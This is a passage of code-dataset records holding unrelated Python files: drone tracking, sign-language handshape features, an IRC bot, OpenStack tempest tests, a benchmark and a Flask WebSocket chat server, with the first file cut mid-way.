train_labels,\n epochs=epochs,\n batch_size=batch_size,\n validation_data=(validation_data, validation_labels))\n model.save_weights(top_model_weights_path)\n \nbottleneck_feature() \ntrain_top_model() ","sub_path":"bottle_neck.py","file_name":"bottle_neck.py","file_ext":"py","file_size_in_byte":3222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"648153982","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jan 30 13:17:54 2018\r\n\r\n@author: Jack\r\n\"\"\"\r\ndef get_Flexion(a):\r\n flexion = 1\r\n if len(a.split(\";\"))>1:\r\n b = a.split(\";\")[0]\r\n else:\r\n b = a\r\n if \"[\" in b:\r\n flexion+=1\r\n if \"<\" in b:\r\n flexion+=2\r\n if \"(\" in b:\r\n flexion+=3\r\n if \"C\" in b:\r\n flexion+=4\r\n if \"O\" in b:\r\n flexion+=5\r\n if \">\" in b:\r\n flexion+=5\r\n if \"@\" in b:\r\n flexion+=6\r\n return flexion\r\n\r\ndef get_thumb_flexion(a):\r\n flex = get_Flexion(a)\r\n if (a.find('T') < a.find(';')) and (\"-\" not in a):\r\n thumb_flex = 1\r\n elif (a.find('T') > a.find(';')) and (flex<3) and (\"-\" not in a):\r\n thumb_flex = 1\r\n elif (\"T-\" in a) and (flex==7):\r\n thumb_flex = 1\r\n elif \"T-\" in a:\r\n 
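# remaining \"T-\" cases default to -1\r\n        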
thumb_flex = -1\r\n else:\r\n thumb_flex = 0\r\n return thumb_flex\r\n\r\ndef get_NSFFlexion(a):\r\n #NSF flexion\r\n nsf_flexion=0\r\n if \"/\" in a: #extended\r\n nsf_flexion-=1\r\n if \"#\" in a: #closed\r\n nsf_flexion+=1\r\n return nsf_flexion\r\n\r\ndef get_nsfflexion_thumb(a):\r\n nsf_flexion = get_NSFFlexion(a)\r\n if \"T-\" in a:\r\n thumb = -1\r\n elif \"T\" in a:\r\n thumb = 1\r\n else:\r\n thumb = 0\r\n return thumb+nsf_flexion\r\n\r\n\r\ndef get_FingComplexity(a):\r\n compF = 0\r\n b = a.split(\" \")\r\n if len(b)>1:\r\n c = [x[0] for x in b]\r\n if len(set(c)) > 1:\r\n compF+=1\r\n #if a.split(\" \")[0][0] != a.split(\" \")[1][0]:\r\n #compF+=1\r\n a = b[0]\r\n if a.count(\";\") == 1:\r\n compF+= 2\r\n elif a.count(\";\") > 1:\r\n compF+= 3\r\n elif a[0] in [\"T\",\"B\",\"1\"]:\r\n compF+= 1\r\n elif a[0] in [\"J\",\"U\",\"8\"]:\r\n compF+= 2\r\n elif a[0] in [\"M\",\"P\",\"D\",\"H\",\"A\",\"2\",\"7\"]:\r\n compF+= 3\r\n else:\r\n compF = \"ERROR\"\r\n #compF = compF/len(a.split(\" \"))\r\n return compF\r\n\r\ndef get_JointComplexity(a):\r\n compJ = 0\r\n if \"K\" in a:\r\n compJ+= 3\r\n elif \"X\" in a:\r\n compJ+= 3\r\n elif \"<\" in a:\r\n compJ+= 2\r\n elif \">\" in a:\r\n compJ+= 2\r\n elif \"C\" in a:\r\n compJ+= 2\r\n elif \"O\" in a:\r\n compJ+= 2\r\n elif \"(\" in a:\r\n compJ+= 2\r\n elif \"[\" in a:\r\n compJ+= 2\r\n elif \"^\" in a:\r\n compJ+= 2\r\n else:\r\n compJ+= 1\r\n #compJ = compJ/len(a.split(\" \"))\r\n return compJ\r\n\r\ndef get_SelectedFing(a):\r\n selfing = \"\"\r\n if \"M\" in a:\r\n selfing+=\"imr\"\r\n if \"P\" in a:\r\n selfing+=\"mp\"\r\n if \"B\" in a:\r\n selfing+=\"imrp\"\r\n if \"D\" in a:\r\n selfing+=\"mrp\"\r\n if \"U\" in a:\r\n selfing+=\"im\"\r\n if \"H\" in a:\r\n selfing+=\"ip\"\r\n if \"A\" in a:\r\n selfing+=\"mr\"\r\n if \"2\" in a:\r\n selfing+=\"rp\"\r\n if \"1\" in a:\r\n selfing+=\"i\"\r\n if \"8\" in a:\r\n selfing+=\"m\"\r\n if \"7\" in a:\r\n selfing+=\"r\"\r\n if \"J\" in a:\r\n selfing+=\"p\"\r\n if \"T\" in a:\r\n selfing+=\"thumb\"\r\n return selfing \r\n\r\ndef get_apChange(a):\r\n b = a.split(\" \")\r\n apChange = 0\r\n if len(b) == 1:\r\n return apChange\r\n else:\r\n c = [get_Flexion(x) for x in b]\r\n for i in range(len(c)-1):\r\n diff = abs(c[i+1] - c[i])\r\n if diff > 3:\r\n apChange +=1\r\n break\r\n #print(c)\r\n if (apChange==0) and (abs(c[-1:][0] - c[0]) > 3):\r\n apChange +=1\r\n return apChange\r\n\r\ndef featureCoding(a):\r\n a = a.upper()\r\n b = a.split(\" \")[0]\r\n aperture_change = 0\r\n extra_point = 0\r\n if len(a.split(\" \"))>1:\r\n #flexion = []\r\n jointComp = []\r\n for x in a.split(\" \"):\r\n #flexion.append(get_Flexion(x))\r\n if \"K\" in x:\r\n jointComp.append(1)\r\n elif \"X\" in x:\r\n jointComp.append(1)\r\n else:\r\n jointComp.append(0)\r\n #for i in range(len(flexion)-1):\r\n #diff = abs(flexion[i+1] - flexion[i])\r\n #if diff > 3:\r\n #aperture_change+=1\r\n #break\r\n if sum(jointComp) != len(a.split(\" \")):\r\n if sum(jointComp) != 0:\r\n extra_point+=1\r\n \r\n\r\n compF = get_FingComplexity(a)\r\n compJ = get_JointComplexity(b) + aperture_change + extra_point\r\n flexion = get_Flexion(b)\r\n nsf_flexion = get_NSFFlexion(b)\r\n selfing = get_SelectedFing(b)\r\n aperture_change = get_apChange(a)\r\n nsf_thumb = get_nsfflexion_thumb(b) \r\n thumb_flex = get_thumb_flexion(b) \r\n\r\n return 
compF,compJ,flexion,nsf_flexion,selfing,aperture_change,nsf_thumb,thumb_flex\r\n","sub_path":"convert_handshape_to_features.py","file_name":"convert_handshape_to_features.py","file_ext":"py","file_size_in_byte":4624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"614988941","text":"# -*- coding: utf-8 -*-\n# Frame_1 : grab the Tello camera stream\n# Frame_2 : grab the Tello camera stream and mark green objects with a rectangle\n# flag=1: manual control of the Tello\n# flag=2: automatically track a green object (x coordinate)\n\nfrom collections import deque\nfrom cv2 import cv2\nimport numpy as np \nimport time\nimport math\nimport socket\n\n# font size\nFONT_SIZE = 0.5\n\n# create the UDP socket\nsocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n# UDP server settings for receiving status\nLOCAL_IP = \"\" # same as \"0.0.0.0\", i.e. listen on all network interfaces\nLOCAL_PORT = 8890 # status is received on port 8890\nsocket.bind((LOCAL_IP, LOCAL_PORT))\n\n# UDP server settings for receiving video\nLOCAL_IP = \"\" # same as \"0.0.0.0\"\nLOCAL_PORT_VIDEO = 11111\naddress = \"udp://\" + LOCAL_IP + \":\" + str(LOCAL_PORT_VIDEO)\n\n# settings for sending commands\nTELLO_IP = \"192.168.10.1\"\nTELLO_PORT = 8889\ntello_address = (TELLO_IP, TELLO_PORT)\n\n# \"command\" must be sent first to enter SDK mode, otherwise no status arrives\nsocket.sendto(\"command\".encode(\"utf-8\"),tello_address)\nsocket.sendto(\"streamon\".encode(\"utf-8\"),tello_address)\ncamera = cv2.VideoCapture(address)\n\n# green thresholds in HSV space: hue (H), saturation (S), value (V)\ngreenLower = np.array([35, 43, 46])\ngreenUpper = np.array([99, 255, 255])\n\n# initialize the list of tracked points\nmybuffer = 30\npts = deque(maxlen=mybuffer)\n\n# use a (640,480) frame size; the native Tello camera size is (960,720)\nframe_width = int(camera.get(cv2.CAP_PROP_FRAME_WIDTH)/1.5)\nframe_height = int(camera.get(cv2.CAP_PROP_FRAME_HEIGHT)/1.5)\nframe_size = (frame_width, frame_height) \nprint(\"Frame Size:\"+repr(frame_size))\n\n# center point of the window\nframe_center_x = int(frame_width/2)\nframe_center_y = int(frame_height/2)\nframe_center = (frame_center_x, frame_center_y)\n\n# initialize the marker coordinates\nmarker_center_x = 0\nmarker_center_y = 0\n\n# variables for computing FPS\nfps = 0\nfps_cnt_frame = 0\nstart_time = time.time()\nrun_time = time.time()\n\n# wait a moment for the connection to stabilize\ntime.sleep(1)\n\n# frame counter\ncommand_cnt_frame = 0 \n\n# variable holding the current time\ncurrent_time = time.time()\n\n# timestamp used to resend \"command\" every few seconds\npre_time = current_time \n\n# flag=1: manual control, flag=2: automatic movement\nflag = 1 \n\nwhile(camera.isOpened()):\n\n    # read the video stream\n    ret,frame = camera.read()\n\n    if not ret:\n        print(\"No camera\") \n        break\n\n    # resize the frame to (640,480)\n    frame = cv2.resize(frame, dsize = (frame_width,frame_height))\n\n    # keep two references to the frame\n    original_frame = frame\n    perform_frame = frame\n\n    # show the unprocessed frame\n    cv2.imshow(\"Original Frame\",original_frame)\n    cv2.moveWindow(\"Original Frame\", 50, 100)\n    \n    # compute FPS\n    fps_cnt_frame = fps_cnt_frame + 1\n    end_time = time.time()\n    diff_time = end_time - start_time\n    if (diff_time > 1):\n        fps = fps_cnt_frame\n        fps_cnt_frame = 0\n        start_time = end_time\n\n    # draw the FPS\n    cv2.putText(perform_frame, \"FPS: \" + str(fps),(10,30),cv2.FONT_HERSHEY_SIMPLEX, FONT_SIZE, (255, 255, 255), 2)\n\n    # battery = socket.sendto(\"battery?\".encode(\"utf-8\"),tello_address)\n    # battery = int(battery)\n    # cv2.putText(perform_frame, \"Battery: \" + str(battery) + \"%\",(10,90),cv2.FONT_HERSHEY_SIMPLEX, FONT_SIZE, (255, 255, 255), 2)\n    \n    # draw the elapsed run time\n    t = round(time.time() - run_time,3)\n    tm = (f\"Time: {t}\")\n    cv2.putText(perform_frame, tm, (10, 60), cv2.FONT_HERSHEY_SIMPLEX, FONT_SIZE, (255, 255, 255), 2)\n\n    # enabling the block below adds a lot of latency\n    # receive at most 1024 bytes; the result goes into the data variable\n    # data, addr = socket.recvfrom(1024)\n    \n    # if data == \"ok\": # loop again if the received data is just \"ok\"\n    #     continue\n\n    # data = str(data).split(\";\") \n    \n    # try:\n    #     bat = data[15].replace(\"bat\",\"Battery\")+(\" %\") \n    #     h = data[16].replace(\"baro\",\"Height\")+(\" cm\") \n    # except IndexError:\n    #     continue\n    \n    # image, text, position, font, size, color, thickness\n    # cv2.putText(perform_frame, bat, (10, 60), cv2.FONT_HERSHEY_SIMPLEX, FONT_SIZE, (255, 255, 255), 2)\n    # cv2.putText(perform_frame, h, (10, 90), cv2.FONT_HERSHEY_SIMPLEX, FONT_SIZE, (255, 255, 255), 2)\n\n    # draw the center point of the frame\n    cv2.circle(perform_frame, frame_center , 2, (26,101,231) , -1)\n\n    if command_cnt_frame > 5:\n\n        # convert the frame to HSV space with cv2.COLOR_BGR2HSV\n        perform_hsv = cv2.cvtColor(perform_frame, cv2.COLOR_BGR2HSV)\n        \n        # build a mask from the thresholds: values below greenLower or above greenUpper become 0, values in between become 255\n        perform_mask = cv2.inRange(perform_hsv, greenLower, greenUpper)\n\n        # erode the mask to make the remaining regions stand out\n        perform_erode = cv2.erode(perform_mask, None, iterations=2)\n\n        # opening / closing morphological operations\n        # then dilate; erosion followed by dilation is an opening, which removes noise \n        perform_dilate = cv2.dilate(perform_erode, None, iterations=2) \n\n        # contour detection\n        perform_cnts = cv2.findContours(perform_dilate, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[-2]\n\n        # initialize the contour centroid \n        marker_center = None \n\n        # if any contour exists\n        if len(perform_cnts) > 0:\n\n            # find the contour with the largest area\n            c = max(perform_cnts, key = cv2.contourArea)\n\n            # bounding rectangle of the largest contour\n            x,y,w,h = cv2.boundingRect(c)\n            #print(x,y,w,h)\n\n            diagonal = math.sqrt(w**2 + h**2) # ** (power), not ^ (bitwise XOR, as in the original)\n            #print(diagonal)\n\n            # compute the moments of the largest contour\n            M = cv2.moments(c)\n            \n            # compute the centroid\n            marker_center_x = int(M[\"m10\"]/M[\"m00\"])\n            marker_center_y = int(M[\"m01\"]/M[\"m00\"])\n            marker_center = (marker_center_x, marker_center_y)\n            \n            # print(f\"marker_center = ({marker_center_x},{marker_center_y})\")\n\n            # only draw when the diagonal is larger than 5\n            if diagonal > 5:\n\n                # draw the outer rectangle\n                cv2.rectangle(perform_frame, (int(x),int(y)), (int(x+w),int(y+h)), (248,147,29), 2)\n\n                # draw the centroid\n                cv2.circle(perform_frame, marker_center, 2, (0,0,255), -1)\n\n                # append the centroid to pts, at the left end of the list\n                pts.appendleft(marker_center)\n        \n        # iterate over the tracked points and draw the trajectory piece by piece \n        # for i in range(1, len(pts)):\n\n        #     if pts[i-1] is None or pts[i] is None:\n        #         continue\n\n        #     # compute the thickness of each small segment\n        #     thickness = int(np.sqrt(mybuffer/float(i+1)*6.5))\n\n        #     # draw the small segment \n        #     cv2.line(frame, pts[i-1], pts[i], (0,0,255), thickness)\n\n        # reset the frame counter\n        command_cnt_frame = 0 \n\n        # difference from the screen center\n        center_diff = frame_center_x - marker_center_x\n        dx = 0.1 * center_diff\n        dx = -dx\n\n        d = 0 if abs(center_diff) < 10.0 else dx \n        # d = 80 if d > 80.0 else d\n        # d = -80 if d < -80.0 else d\n        # print(\"d = \"+str(d))\n\n        center_diff = int(center_diff)\n        d = int(d)\n        cv2.putText(perform_frame, \"Diff: \" + str(center_diff), (10, 90), cv2.FONT_HERSHEY_SIMPLEX, FONT_SIZE, (255, 255, 255), 2)\n        cv2.putText(perform_frame, \"d: \" + str(d), (10, 120), cv2.FONT_HERSHEY_SIMPLEX, FONT_SIZE, (255, 255, 255), 2)\n\n        if(flag == 2 and d != 0):\n            \n            #socket.sendto(\"cw 10\".encode(\"utf-8\"),tello_address)\n            socket.sendto((f\"rc {d} 0 0 0\").encode(\"utf-8\"),tello_address)\n            print(f\"Move {d} 0 0 0\")\n\n    # mirror flip\n    # frame = cv2.flip(frame ,1) \n\n    # one more frame\n    command_cnt_frame += 1\n\n    # show the processed frame\n    cv2.imshow(\"Perform Frame\",perform_frame)\n    cv2.moveWindow(\"Perform Frame\", 750, 100)\n\n    # get the current time\n    current_time = time.time() \n\n    # have more than 4 seconds passed since the last send?\n    if current_time - pre_time > 4.0 : \n\n        # send \"command\" to keep the SDK session alive\n        socket.sendto(\"command\".encode(\"utf-8\"),tello_address) \n\n        # update the last-send time\n        pre_time = current_time \n\n    # key handling; press \"p\" to exit the loop \n\n    key = cv2.waitKey(1) & 0xFF\n\n    if key == ord(\"p\"): \n        print(\"Exit\")\n        break \n\n    elif key == ord(\"1\"):\n        flag = 1 \n        socket.sendto(\"rc 0 0 0 0\".encode(\"utf-8\"),tello_address) \n        print(\"Manual\")\n\n    elif key == ord(\"2\"):\n        flag = 2\n        print(\"Automatic\")\n\n    elif key == ord(\"t\"):\n        # socket.sendto(\"command\".encode(\"utf-8\"),tello_address)\n        socket.sendto(\"takeoff\".encode(\"utf-8\"),tello_address)\n        print(\"Take off\")\n        time.sleep(0.5)\n\n    elif key == ord(\"l\"):\n        flag = 1\n        socket.sendto(\"rc 0 0 0 0\".encode(\"utf-8\"),tello_address) \n        socket.sendto(\"land\".encode(\"utf-8\"),tello_address)\n        print(\"Land\")\n        time.sleep(1)\n\n    elif key == ord(\"r\"):\n        socket.sendto(\"up 50\".encode(\"utf-8\"),tello_address) \n        print(\"Up\")\n\n    elif key == ord(\"f\"):\n        socket.sendto(\"down 20\".encode(\"utf-8\"),tello_address) \n        print(\"Down\") \n    \n    elif key == ord(\"w\"):\n        socket.sendto(\"forward 20\".encode(\"utf-8\"),tello_address)\n        print(\"Forward\") \n\n    elif key == ord(\"s\"):\n        socket.sendto(\"back 20\".encode(\"utf-8\"),tello_address) \n        print(\"Back\")\n\n    elif key == ord(\"a\"):\n        socket.sendto(\"left 20\".encode(\"utf-8\"),tello_address) \n        print(\"Left\")\n    \n    elif key == ord(\"d\"):\n        socket.sendto(\"right 20\".encode(\"utf-8\"),tello_address) \n        print(\"Right\") \n\n    elif key == ord(\"q\"):\n        socket.sendto(\"cw 20\".encode(\"utf-8\"),tello_address) \n        print(\"Clockwise\")\n\n    elif key == ord(\"e\"):\n        socket.sendto(\"ccw 20\".encode(\"utf-8\"),tello_address) \n        print(\"Counterclockwise\")\n\n# stop the video stream \nsocket.sendto(\"streamoff\".encode(\"utf-8\"),tello_address)\n\n# release the camera \ncamera.release()\n\n# destroy all windows\ncv2.destroyAllWindows()","sub_path":"Past/Tello_5.py","file_name":"Tello_5.py","file_ext":"py","file_size_in_byte":10362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"143037185","text":"# -*- coding: utf-8 -*-\n# @Author : llc\n# @Time : 2020/3/6 15:47\n\nfrom app import create_app\n\napplication = create_app()\n\nif __name__ == '__main__':\n    application.run(host='0.0.0.0', port=8000, debug=True)\n","sub_path":"src/app/webapp.py","file_name":"webapp.py","file_ext":"py","file_size_in_byte":212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"172221155","text":"import re\nimport json\nfrom kaarmebot.plugin import plugin_config\nfrom kaarmebot import irc\nfrom urllib import urlopen\nfrom urlparse import parse_qs\n\n\n@plugin_config(name=\"echo\")\ndef echo_to_source(request):\n    message = request.message\n    d = re.match('(?P<nick>.*): (?P<msg>.*)', message.body).groupdict()\n    msg = d.get('msg')\n    nick = d.get('nick')\n    my_nick = request.source_settings.get('nick')\n    target = message.parameters[0]\n    source = irc.string_to_person(message.name).nick\n    if msg and nick == my_nick:\n        if target != nick:\n            return irc.privmsg(target, \"%s: %s\" % (source, msg))\n        else:\n            return irc.privmsg(source, \"%s: %s\" % (source, msg))\n    return None\n\n\n@plugin_config(name=\"utube\")\ndef utube(request):\n    message = request.message\n    target = message.parameters[0]\n    vid = get_youtube_video_id_from_url(message.body)\n    if vid:\n        url = ''.join(('https://gdata.youtube.com/feeds/api/videos/',\n                       vid, '?v=2&alt=json'))\n        res = urlopen(url).read()\n        d = json.loads(res)\n        title = d['entry']['title']['$t']\n        return irc.privmsg(target, \"YouTube: %s\" % title)\n    return None\n\n\ndef get_youtube_video_id_from_url(contents):\n    short_url_match = re.match('.*https?://youtu\\.be/(?P<vid>[^\\s]+).*',\n                               contents)\n    if short_url_match:\n        return short_url_match.groupdict().get('vid')\n\n    long_url_match = re.match(\n        
'.*https?://[.\\w]*youtube\\.com/watch\\?(?P<path>[^\\s]+).*',\n contents)\n\n if long_url_match:\n return parse_qs(long_url_match.groupdict().get('path', '')).get('v')[0]\n\n return None\n","sub_path":"example_plugin.py","file_name":"example_plugin.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"23039649","text":"import sys\nsys.stdin = open('input.txt', 'r')\n\ndef dfs(i, temp, a, b, c, d):\n if not a and not b and not c and not d:\n global maxval, minval\n if minval == None:\n minval = maxval = temp\n if temp < minval:\n minval = temp\n elif temp > maxval:\n maxval = temp\n return\n if a: dfs(i+1, temp+nums[i+1], a-1, b, c, d)\n if b: dfs(i+1, temp-nums[i+1], a, b-1, c, d)\n if c: dfs(i+1, temp*nums[i+1], a, b, c-1, d)\n if d: dfs(i+1, int(temp/nums[i+1]), a, b, c, d-1)\n\nfor tc in range(1, int(input())+1):\n N = int(input())\n a, b, c, d = map(int, input().split())\n nums = list(map(int, input().split()))\n minval = maxval = None\n dfs(0, nums[0], a, b, c, d)\n print('#{} {}'.format(tc, maxval-minval))\n\n\n# def operation(n, op, m):\n# if op == 0:\n# return n+m\n# elif op == 1:\n# return n-m\n# elif op == 2:\n# return n*m\n# else:\n# return n//m\n#\n# def dfs(i, temp, a):\n# if i == N-1:\n# global maxval, minval\n# if temp < minval:\n# minval = temp\n# elif temp > maxval:\n# maxval = temp\n# return\n# for k in range(N-1):\n# if not visit[k]:\n# visit[k] = True\n# b = a + [q[k]]\n# if b not in memo[i]:\n# memo[i].append(b)\n# dfs(i+1, operation(temp, q[k], nums[i+1]), b)\n# visit[k] = False\n#\n# for tc in range(1, int(input())+1):\n# N = int(input())\n# op = list(map(int, input().split()))\n# nums = list(map(int, input().split()))\n# visit = [False]*(N-1)\n# memo = [[] for _ in range(N-1)]\n# temp = nums[0]\n# q = []\n# n = 0\n# for i in range(4):\n# for j in range(op[i]):\n# q.append(i)\n# n += 1\n# temp = operation(temp, i, nums[n])\n# minval = maxval = 0\n# dfs(0, nums[0], [])\n# print('#{} {}'.format(tc, maxval-minval))","sub_path":"swea/SAMSUNG/4008.py","file_name":"4008.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"137131399","text":"\n\nfrom daisy_tempest import base\n\n\nclass DaisyComponentTest(base.BaseDaisyTest):\n\n @classmethod\n def resource_setup(cls):\n super(DaisyComponentTest, cls).resource_setup()\n cls.host_meta = {'name': 'test_add_host',\n 'description': 'test_tempest'}\n cls.host_meta_interfaces = \\\n {'type': 'ether',\n 'name': 'eth1',\n 'mac': 'fe80::f816:3eff',\n 'ip': '10.43.177.121',\n 'netmask': '255.255.254.0',\n 'is_deployment': 'True',\n 'assigned_networks': ['MANAGEMENT', 'DEPLOYMENT'],\n 'slaves': 'eth1'}\n\n cls.cluster_meta = \\\n {'description': 'desc',\n 'logic_networks':\n [{'name': 'external1',\n 'physnet_name': 'PRIVATE',\n 'segmentation_id': 200,\n 'segmentation_type': 'vlan',\n 'shared': True,\n 'subnets': [{'cidr': '192.168.1.0/24',\n 'dns_nameservers': ['8.8.4.4',\n '8.8.8.8'],\n 'floating_ranges': [['192.168.1.2',\n '192.168.1.200']],\n 'gateway': '192.168.1.1',\n 'name': 'subnet2'},\n {'cidr': '172.16.1.0/24',\n 'dns_nameservers': ['8.8.4.4',\n '8.8.8.8'],\n 'floating_ranges': [['172.16.1.130',\n '172.16.1.150'],\n ['172.16.1.151',\n '172.16.1.254']],\n 'gateway': '172.16.1.1',\n 'name': 'subnet10'}],\n 'type': 'external'},\n {'name': 'external2',\n 'physnet_name': 'PUBLIC',\n 'segmentation_id': 1023,\n 'segmentation_type': 'vxlan',\n 
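# note: this vxlan segmentation_id (1023) falls inside the vni_range [1000, 1030] set in networking_parameters below\n             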
'shared': True,\n 'subnets': [{'cidr': '192.168.2.0/24',\n 'dns_nameservers': ['8.8.4.4',\n '8.8.8.8'],\n 'floating_ranges': [['192.168.2.130',\n '192.168.2.254']],\n 'gateway': '192.168.2.1',\n 'name': 'subnet123'}],\n 'type': 'external'},\n {'name': 'internal1',\n 'physnet_name': 'PRIVATE',\n 'segmentation_id': '777',\n 'segmentation_type': 'vlan',\n 'shared': False,\n 'subnets': [{'cidr': '192.168.31.0/24',\n 'dns_nameservers': ['8.8.4.4',\n '8.8.8.8'],\n 'floating_ranges': [['192.168.31.130',\n '192.168.31.254']],\n 'gateway': '192.168.31.1',\n 'name': 'subnet3'},\n {'cidr': '192.168.4.0/24',\n 'dns_nameservers': ['8.8.4.4',\n '8.8.8.8'],\n 'floating_ranges': [['192.168.4.130',\n '192.168.4.254']],\n 'gateway': '192.168.4.1',\n 'name': 'subnet4'}],\n 'type': 'internal'}],\n 'name': 'test',\n 'networking_parameters': {'base_mac': 'fa:16:3e:00:00:00',\n 'gre_id_range': [2, 2000],\n 'net_l23_provider': 'ovs',\n 'public_vip': '172.16.0.3',\n 'segmentation_type': 'vlan,vxlan',\n 'vlan_range': [2, 4094],\n 'vni_range': [1000, 1030]},\n 'networks': [],\n 'nodes': [],\n 'routers': [{'description': 'router1',\n 'external_logic_network': 'external1',\n 'name': 'router1',\n 'subnets': ['subnet4', 'subnet3']},\n {'description': 'router2',\n 'external_logic_network': 'external2',\n 'name': 'router2',\n 'subnets': ['subnet2', 'subnet10']}]}\n cls.component_meta = {'name': 'test_component',\n 'description': 'test'}\n\n def test_list_component(self):\n component_meta = {}\n component_flag = True\n list_component = self.list_component(**component_meta)\n query_component_list = [component_info for component_info\n in list_component]\n component_list = [\"camellia\", \"ha\", \"loadbalance\", \"amqp\", \"database\",\n \"keystone\", \"ironic\", \"neutron\",\n \"horizon\", \"ceilometer\", \"glance\", \"heat\", \"nova\",\n \"cinder\"]\n for query_component in query_component_list:\n if query_component.name not in component_list:\n component_flag = False\n self.assertTrue(component_flag, \"test_list_component error\")\n\n def test_add_component(self):\n component = self.add_component(**self.component_meta)\n self.assertEqual(\"test_component\",\n component.name,\n \"test_add_component failed\")\n self.delete_component(component.id)\n\n def test_component_delete(self):\n component = self.add_component(**self.component_meta)\n self.delete_component(component.id)\n component_flag = True\n component_meta = {}\n list_component = self.list_component(**component_meta)\n query_component_list = [component_info for component_info\n in list_component]\n for query_component in query_component_list:\n if component.name == query_component.name:\n component_flag = False\n self.assertTrue(component_flag, \"test_list_component error\")\n\n def test_get_component_detail(self):\n add_component_info = self.add_component(**self.component_meta)\n get_component = self.get_component(add_component_info.id)\n self.assertEqual('test_component', get_component.name)\n self.delete_component(get_component.id)\n\n def test_update_component(self):\n add_component_info = self.add_component(**self.component_meta)\n update_component_meta = {'name': 'test_update_component',\n 'description': 'test_tempest'}\n update_component_info = self.update_component(add_component_info.id,\n **update_component_meta)\n self.assertEqual(\"test_update_component\",\n update_component_info.name,\n \"test_update_component_with_cluster failed\")\n 
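# clean up the component created for this test\n        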
self.delete_component(add_component_info.id)\n","sub_path":"test/tempest/daisy_tempest/v1/test_component.py","file_name":"test_component.py","file_ext":"py","file_size_in_byte":7253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"11913820","text":"#!/usr/bin/python\n\nimport nji\nimport os\nimport time\nimport threading\n\nprint(\"Benchmarking installed njic\")\n\nclass Benchmark(threading.Thread):\n    def __init__(self, javap):\n        threading.Thread.__init__(self)\n        self.javap = javap\n    def run(self):\n        nji.parse(open(path), None, self.javap)\n\nthread_count = 8\ncount = 100\n#path = os.path.join(os.getcwd(), 'thread.nji')\npath = os.path.join('/home/brock/code/libnji/test', 'thread.nji')\nthreads = []\nprint(\"Benchmarking default nji.parse shelling out to javap {} times\".format(count))\nstart = time.perf_counter()\ni = 0\nwhile i < count:\n    threads = []\n    for j in range(thread_count):\n        thread = Benchmark(False)\n        thread.start()\n        threads.append(thread)\n\n    for t in threads:\n        t.join()\n    i += thread_count\n    print(\"{} threads done\".format(i))\n\nend = time.perf_counter()\nprint(\"Default nji.parse took {} seconds\".format(end-start))\n\nprint(\"Benchmarking nji.parse using pyjavap {} times\".format(count))\nstart = time.perf_counter()\ni = 0\nwhile i < count:\n    threads = []\n    for j in range(thread_count):\n        thread = Benchmark(True) # pyjavap run; the original passed False here, which just repeated the first benchmark\n        thread.start()\n        threads.append(thread)\n\n    for t in threads:\n        t.join()\n    i += thread_count\n    print(\"{} threads done\".format(i))\nend = time.perf_counter()\nprint(\"nji.parse with pyjavap took {} seconds\".format(end-start))\n","sub_path":"tools/njic/src/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"139629151","text":"\"\"\"\nChat Server\n===========\n\nThis simple application uses WebSockets to run a primitive chat server.\n\"\"\"\n\nimport ast\nimport os\nimport time\nfrom flask import Flask, render_template\nfrom flask_sockets import Sockets\n\napp = Flask(__name__)\napp.debug = 'DEBUG' in os.environ\nsockets = Sockets(app)\n\n\nclass ChatBackend(object):\n\n    def __init__(self):\n        \"\"\"Maintain list of subscriptions (client, list of channels pair).\"\"\"\n        self.subscriptions = list()\n\n    def publish(self, message):\n        \"\"\"Send message to client if client is subscribed.\"\"\"\n        for subscription in self.subscriptions:\n            for subscribed_channel in subscription['channels']:\n                channel = ast.literal_eval(message)['handle']\n                if subscribed_channel == channel:\n                    try:\n                        subscription['client'].send(message)\n                    except Exception:\n                        self.subscriptions.remove(subscription)\n\n    def subscribe(self, client, channels):\n        \"\"\"Add a subscription (client, list of channels pair).\"\"\"\n        subscription = {'client': client, 'channels': channels}\n        self.subscriptions.append(subscription)\n\nchats = ChatBackend()\n\n\n@app.route('/')\ndef hello():\n    return render_template('index.html')\n\n\n@sockets.route('/submit')\ndef inbox(ws):\n    \"\"\"Receives incoming chat messages and publishes them.\"\"\"\n    while ws.socket is not None:\n        # Sleep to prevent *constant* context-switches.\n        time.sleep(0.1)\n        message = ws.receive()\n\n        if message:\n            chats.publish(message)\n\n\n@sockets.route('/receive')\ndef outbox(ws):\n    \"\"\"Sends outgoing chat messages, via `ChatBackend`.\"\"\"\n    chats.subscribe(ws, ['channel1', 'channel2'])\n\n    while ws.socket is not None:\n        # Context switch while 
`ChatBackend` is running in the background.\n        time.sleep(0.1) # mirrors the 0.1s sleep in inbox(); the original bare time.sleep() raises a TypeError\n","sub_path":"chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
